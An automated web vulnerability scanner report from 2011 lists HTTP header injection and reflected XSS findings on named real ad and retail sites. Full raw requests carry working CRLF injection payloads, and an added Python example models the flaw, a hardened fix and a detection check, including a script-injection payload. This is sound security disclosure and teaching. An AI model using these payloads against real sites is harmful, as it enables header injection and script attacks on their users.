CWE-79, XSS, DORK Report, Cross Site Scripting, HTTP Header Injection

DORK CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:50:20 CST 2011.


1. HTTP header injection

1.1. http://amch.questionmarket.com/adsc/d851369/20/40646337/decide.php [ES cookie]

1.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

1.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

1.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

1.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

1.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.11. http://us.ebayobjects.com/1ai/ebay.ebayus.58058/networking_and_communications [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.2. http://api.facebook.com/restserver.php [method parameter]

2.3. http://api.facebook.com/restserver.php [urls parameter]

2.4. http://api.viglink.com/api/ping [key parameter]

2.5. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.6. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.7. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.8. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.9. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.10. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.11. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.12. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]

2.13. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]

2.14. http://digg.com/remote-submit [REST URL parameter 1]

2.15. http://digg.com/submit [REST URL parameter 1]

2.16. http://hubpages.com/ [name of an arbitrarily supplied request parameter]

2.17. http://hubpages.com/about/advertise [REST URL parameter 1]

2.18. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]

2.19. http://hubpages.com/hubs/hot/ [REST URL parameter 1]

2.20. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]

2.21. http://hubpages.com/my/hubs/stats [REST URL parameter 1]

2.22. http://hubpages.com/my/hubs/stats [REST URL parameter 2]

2.23. http://hubpages.com/my/hubs/stats [REST URL parameter 3]

2.24. http://hubpages.com/signin/ [REST URL parameter 1]

2.25. http://hubpages.com/topics/ [REST URL parameter 1]

2.26. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]

2.27. http://hubpages.com/tour/affiliate [REST URL parameter 1]

2.28. http://hubpages.com/tour/affiliate [REST URL parameter 2]

2.29. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]

2.30. http://hubpages.com/user/new/ [REST URL parameter 1]

2.31. http://hubpages.com/user/new/ [REST URL parameter 2]

2.32. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]

2.33. https://hubpages.com/signin/ [REST URL parameter 1]

2.34. https://hubpages.com/signin/ [REST URL parameter 1]

2.35. https://hubpages.com/signin/ [explain parameter]

2.36. https://hubpages.com/signin/ [explain parameter]

2.37. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]

2.38. https://hubpages.com/signin/ [s parameter]

2.39. https://hubpages.com/signin/ [s parameter]

2.40. https://hubpages.com/signin/ [url parameter]

2.41. https://hubpages.com/signin/ [url parameter]

2.42. https://hubpages.com/signin/reset/ [REST URL parameter 1]

2.43. https://hubpages.com/signin/reset/ [REST URL parameter 1]

2.44. https://hubpages.com/signin/reset/ [REST URL parameter 2]

2.45. https://hubpages.com/signin/reset/ [REST URL parameter 2]

2.46. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]

2.47. http://otakubooty.com/Default.asp [login parameter]

2.48. http://otakubooty.com/Default.asp [login parameter]

2.49. http://otakubooty.com/Default.asp [name of an arbitrarily supplied request parameter]

2.50. http://otakubooty.com/oa.asp [name of an arbitrarily supplied request parameter]

2.51. http://otakubooty.com/of.asp [name of an arbitrarily supplied request parameter]

2.52. http://otakubooty.com/otaku_help.asp [name of an arbitrarily supplied request parameter]

2.53. http://otakubooty.com/otaku_help.asp [tab parameter]

2.54. http://otakubooty.com/otaku_news.asp [name of an arbitrarily supplied request parameter]

2.55. http://otakubooty.com/otaku_search.asp [name of an arbitrarily supplied request parameter]

2.56. http://otakubooty.com/otaku_signup.asp [name of an arbitrarily supplied request parameter]

2.57. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]

2.58. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]

2.59. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]

2.60. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]

2.61. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]

2.62. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]

2.63. http://rover.ebay.com/idmap/0 [footer&cb parameter]

2.64. http://tags.bluekai.com/site/50 [phint parameter]

2.65. http://widgets.digg.com/buttons/count [url parameter]

2.66. http://wine.com/ScriptResource.axd [Lo0P parameter]

2.67. http://wine.com/i-js.js [Lo0P parameter]

2.68. http://wine.com/includes/analytics/s_remote_code.js [Lo0P parameter]

2.69. http://www.floristexpress.net/ [refcode parameter]

2.70. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

2.71. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

2.72. http://www.wine.com/favicon.ico [REST URL parameter 1]

2.73. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 1]

2.74. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 2]

2.75. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 3]

2.76. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 1]

2.77. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 2]

2.78. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 3]

2.79. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 1]

2.80. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 2]

2.81. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 3]

2.82. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 1]

2.83. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 2]

2.84. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 3]

2.85. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspx [REST URL parameter 3]

2.86. http://www.wine.com/v6/giftcenter/proflowersproduct.aspx [REST URL parameter 3]

2.87. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [Referer HTTP header]

2.88. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [Referer HTTP header]

2.89. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [Referer HTTP header]

2.90. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [Referer HTTP header]

2.91. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [Referer HTTP header]

2.92. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [Referer HTTP header]

2.93. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [Referer HTTP header]

2.94. http://tags.bluekai.com/site/50 [Referer HTTP header]

2.95. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.96. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

2.97. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.98. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.99. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

2.100. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

2.101. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

2.102. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

2.103. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

2.104. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

2.105. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

2.106. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

2.107. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

2.108. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

2.109. http://ar.voicefive.com/bmx3/node_hulu.pli [UID cookie]

2.110. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

2.111. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p45555483 cookie]

2.112. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p67161473 cookie]

2.113. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p83612734 cookie]

2.114. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p85001580 cookie]

2.115. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [PFC_BrowserId cookie]

2.116. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]

2.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]

2.118. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [PFC_BrowserId cookie]

2.119. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [PFC_BrowserId cookie]

2.120. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [PFC_BrowserId cookie]

2.121. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [PFC_BrowserId cookie]

2.122. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [PFC_BrowserId cookie]

2.123. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [PFC_BrowserId cookie]

2.124. http://www.floristexpress.net/ [ref_code cookie]

2.125. http://www.floristexpress.net/ [ref_code cookie]

2.126. http://www.floristexpress.net/comeback.htm [ref_code cookie]

2.127. http://www.floristexpress.net/comeback.htm [ref_code cookie]

2.128. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]

2.129. http://www.floristexpress.net/search.htm [ref_code cookie]

2.130. http://www.floristexpress.net/search.htm [ref_code cookie]



1. HTTP header injection
There are 11 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header without being filtered or encoded. If an attacker can inject newline characters into the header (carriage return and line feed, sent as %0d%0a in the payloads recorded below), then they can terminate the current header and append new HTTP headers of their choosing and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
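The following is an added example, not part of the scanner report or of any scanned site's code. It models both sides of finding 1.2 in Python: a hypothetical server stand-in (`serve`) that concatenates the decoded `code` parameter into the `Location` header the way the unfiltered endpoint evidently does, the same header built safely, and the check the crawler applies to decide that a header was injected. The payload `1a15a%0d%0a7b6ce45e099` and the `log_ut_err.php` URL prefix are taken from finding 1.2; everything else (the function names, the `serve` stand-in, the `<script>` body-splitting variant) is constructed for illustration.

```python
"""Added example, not part of the scanner report or of the scanned sites' code.

Models finding 1.2 above: a server that concatenates a request parameter
into the Location header, the same endpoint hardened, and the check the
crawler performs to decide that a header was injected.  The server is a
hypothetical Python stand-in; the payload is the one recorded in the report.
"""
import re
from urllib.parse import quote, unquote

# URL prefix seen in the Location header of finding 1.2 (trimmed to one parameter).
LOG_URL = "http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&code="

_CRLF_OR_NUL = re.compile(r"[\r\n\x00]")


def build_location_vulnerable(code: str) -> str:
    """Vulnerable: the decoded parameter is dropped straight into the header value."""
    return "Location: " + LOG_URL + code


def build_location_hardened(code: str) -> str:
    """Hardened: percent-encode the value for the URL context it lands in, then
    refuse to emit the header if a bare CR/LF/NUL somehow survived (defence in depth)."""
    value = "Location: " + LOG_URL + quote(code, safe="")
    if _CRLF_OR_NUL.search(value):
        raise ValueError("refusing to emit header containing CR/LF/NUL")
    return value


def serve(code_param: str, build) -> bytes:
    """Constructed stand-in for st.php: decodes the query value the way a
    server-side framework would, then emits a 302 whose Location header
    comes from `build`."""
    code = unquote(code_param)
    head = "HTTP/1.1 302 Found\r\n" + build(code) + "\r\nContent-Length: 0\r\n\r\n"
    return head.encode("latin-1")


def header_lines(raw: bytes) -> list[str]:
    """Raw header lines of a response: everything between the status line and
    the first blank line, split on CRLF exactly as an HTTP client would."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    return head.decode("latin-1").split("\r\n")[1:]


def header_injected(raw: bytes, marker: str) -> bool:
    """The crawler's test: the payload was '<prefix>%0d%0a<marker>'.  If some
    header line now *begins* with the marker, the CRLF ended the original
    header and the attacker controls a fresh line, i.e. a new header."""
    return any(line.startswith(marker) for line in header_lines(raw))


def body_injected(raw: bytes, marker: str) -> bool:
    """Stronger variant: a doubled CRLF in the payload ends the header block,
    so the marker lands in the body (the response-splitting case)."""
    _head, _, body = raw.partition(b"\r\n\r\n")
    return body.startswith(marker.encode("latin-1"))


PAYLOAD = "1a15a%0d%0a7b6ce45e099"   # exactly the payload recorded in finding 1.2
MARKER = "7b6ce45e099"               # the part that must start a new line to count as injected
BODY_PAYLOAD = "%0d%0a%0d%0a<script>alert(1)</script>"  # constructed: breaks into the body

if __name__ == "__main__":
    print(header_injected(serve(PAYLOAD, build_location_vulnerable), MARKER))       # True
    print(header_injected(serve(PAYLOAD, build_location_hardened), MARKER))         # False
    print(body_injected(serve(BODY_PAYLOAD, build_location_vulnerable), "<script>"))  # True
    print(body_injected(serve(BODY_PAYLOAD, build_location_hardened), "<script>"))    # False
```

Run it directly to see the four outcomes. The hardened builder fixes the problem at its root by encoding the value for the URL context it is placed in, so `%0d%0a` stays literal text inside the query string, and it still refuses any header value in which a bare CR, LF or NUL survives; that second check is the kind of protection PHP itself added to `header()` in 5.1.2, which the `X-Powered-By: PHP/4.3.8` banner in the responses below predates. `body_injected` covers the full response-splitting case from the background text, where a second CRLF ends the header block and the attacker writes the body that a browser or intermediate cache will consume.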



1.1. http://amch.questionmarket.com/adsc/d851369/20/40646337/decide.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d851369/20/40646337/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 385e1%0d%0a1ad6393d34c was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d851369/20/40646337/decide.php?ord=1297607125 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2; ES=385e1%0d%0a1ad6393d34c

Response

HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 14:29:56 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Sat, 13-Feb-2010 14:29:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-1; expires=Thu, 05-Apr-2012 06:29:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=385e1
1ad6393d34c
_851369-l8luM-0; expires=Thu, 05-Apr-2012 06:29:56 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 1a15a%0d%0a7b6ce45e099 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=851369&site=59899979&code=406463251a15a%0d%0a7b6ce45e099&randnum=3683655 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_851369-G1vtM-FH_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q

Response

HTTP/1.1 302 Found
Date: Sun, 13 Feb 2011 14:29:29 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Sat, 13-Feb-2010 14:29:28 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_851369-1-1; expires=Thu, 05-Apr-2012 06:29:29 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q_851369-G1vtM-47@; expires=Thu, 05-Apr-2012 06:29:29 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=851369&site=20-59899979-&code=406463251a15a
7b6ce45e099

Content-Length: 0
Content-Type: text/html


1.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 5829f%0d%0a230f90016ee was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=851369&site=598999795829f%0d%0a230f90016ee&code=40646325&randnum=3683655 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_851369-G1vtM-FH_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q

Response

HTTP/1.1 302 Found
Date: Sun, 13 Feb 2011 14:29:25 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sat, 13-Feb-2010 14:29:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_851369-1-1; expires=Thu, 05-Apr-2012 06:29:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q_851369-G1vtM-07@; expires=Thu, 05-Apr-2012 06:29:25 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=851369&site=-1-598999795829f
230f90016ee
-&code=40646325
Content-Length: 0
Content-Type: text/html


1.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload 22625%0d%0a1191c28caf6 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=10.2154&wmpv=0&res=128&bwVal=22625%0d%0a1191c28caf6&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=22625
1191c28caf6
&BWDate=40587.404919&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

